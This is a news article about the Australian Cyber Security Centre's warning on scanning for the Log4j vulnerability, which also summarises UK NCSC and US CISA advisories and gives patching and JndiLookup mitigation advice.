Australia warns that cybercriminals scanning entities for serious cyber vulnerabilities, following Log4j attack

The Australian Cyber Security Centre (ACSC) said on Tuesday that it is seeing cybercriminals attempting to find those who remain vulnerable to the Log4j software vulnerability, as malicious cyber adversaries conduct thousands of scans in search of the vulnerability. In the light of this, the security agency has asked Australian businesses and individuals to ‘urgently patch their applications and software products.’

The cybersecurity agency said that thousands of software products that use this common piece of computer code are at risk from cybercriminals, and many are yet to be fixed. “If not fixed, cyber attackers can break into an organisation’s systems, steal user passwords and login details, extract sensitive data, and infect its networks with malicious software causing widespread business interruption,” it added.

The Australian guidance comes as a third Log4j vulnerability has been discovered – this time for a Denial of Service (DoS) bug. Tracked as CVE-2021-45105, the latest Log4j bug isn’t a variant of the Log4Shell remote-code execution bug, though it is said to have similar components, and can also abuse the attacker-controlled lookups in logged data. This issue was fixed in Log4j 2.17.0 and 2.12.3.

Given the current focus on Log4j vulnerabilities by both the security research community and cybercriminals, additional vulnerabilities may be discovered within Log4j. Australian organizations are strongly encouraged to remain aware of any emerging vulnerabilities and available patches.

The ACSC is aware of around 400 vendors who may use this library. These vendors are responsible for some of the most common software globally, including messaging and productivity applications, mobile device managers, teleconference software, web hosting, and video games. The ACSC said that it is working with a significant number of victims and affected vendors across all sectors of the economy.

Assistant Minister for Defence, Andrew Hastie said thousands of Australian organizations had already been subject to targeted reconnaissance, and many have been exploited and compromised. 

“This is a serious vulnerability in affected systems, akin to leaving every door and window in your home unlocked on Christmas Eve,” Hastie said in a media statement. “It is absolutely critical that Australian businesses and households patch their systems and networks urgently before going on holidays. Not doing so will give our cyber adversaries an early Christmas present. Cybercriminals don’t take a holiday for the Christmas season. They are ruthless and opportunistic.”

“This requires immediate action,” according to Hastie. “Therefore I am calling on all Australian businesses and households to ensure their applications and products are patched and up-to-date, and to follow the ACSC advisories. Even after patching, organisations must continue to monitor to see if any attackers are still lurking in their systems,” Hastie added.

Log4j is a widely used open-source logging library for Java applications, which works as a key building block that is reused to provide logging functionality to help system developers troubleshoot in a large number of applications globally. Over 100,000 products from hundreds of vendors and in-house developed software may contain Log4j. If left unfixed cybercriminals can gain control of vulnerable systems, steal personal data, passwords, and files, in addition to installing backdoors for future access, cryptocurrency mining tools, and ransomware.

The Australian agency also identifies a large number of third-party applications may also be vulnerable to exploitation. Google estimates that more than 35,000 Java packages may be affected, 80 times more than the median Java vulnerability.

The advisory has asked individuals to update applications as soon as vendor patches become available, and make sure devices and applications are secure by updating regularly and setting automatic updates where possible.

Organizations have been asked to contact their vendors and apply the latest patches immediately where Log4j is known to be used. They should also check internally developed or in-house software for use of Log4j and upgrade to the latest version of Log4j, or consider disabling the ‘JndiLookup’ class. Software vendors should work to identify their use of the Log4j logging library in their products and develop the required patches including the latest available version of Log4j to assist their customers to remediate the vulnerability on their systems.

Where upgrading is not possible, organizations should apply the hardening advice to disable the JndiLookup class. For software that organizations directly manage, mitigation advice on how to disable the JNDI (Java Naming and Directory Interface) points has been published in many places.

Australian organizations should identify vulnerable applications and services running in their environment. The ACSC further recommends that organizations check the logs of these systems for evidence of exploitation attempts using the Log4j techniques. 

System administrators should check potentially vulnerable servers for outbound traffic to hosts outside the local network which may indicate communication with command and control nodes or traffic to internal hosts indicating attempts of lateral movement. If present, any activity detected using this method warrants further investigation.

The U.K.’s National Cyber Security Centre (NCSC) also updated its advisory asking organizations on Tuesday to take steps to mitigate the Apache Log4j vulnerabilities. Affected UK organizations have been asked to report any evidence of compromise relating to the vulnerability to the NCSC through the website.

“The NCSC is aware of widespread scanning for this vulnerability and we note that almost all organisations will have received HTTP requests with the JNDI string. We do not require reports of scanning activity,” it added in its latest alert. 

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued last Friday an emergency directive asking federal civilian executive branch agencies to mitigate the threats caused by the Apache Log4j series of vulnerabilities.  

CISA has asked the federal civilian executive branch agencies to enumerate all solution stacks accepting data input from the internet, and evaluate all software assets in identified solution stacks against the CISA-managed GitHub repository to determine whether Log4j is present in those assets and if so, whether those assets are affected by the vulnerability by 5 pm EST on Dec. 23.

Anna Ribeiro

Industrial Cyber News Editor. Anna Ribeiro is a freelance journalist with over 14 years of experience in the areas of security, data storage, virtualization and IoT.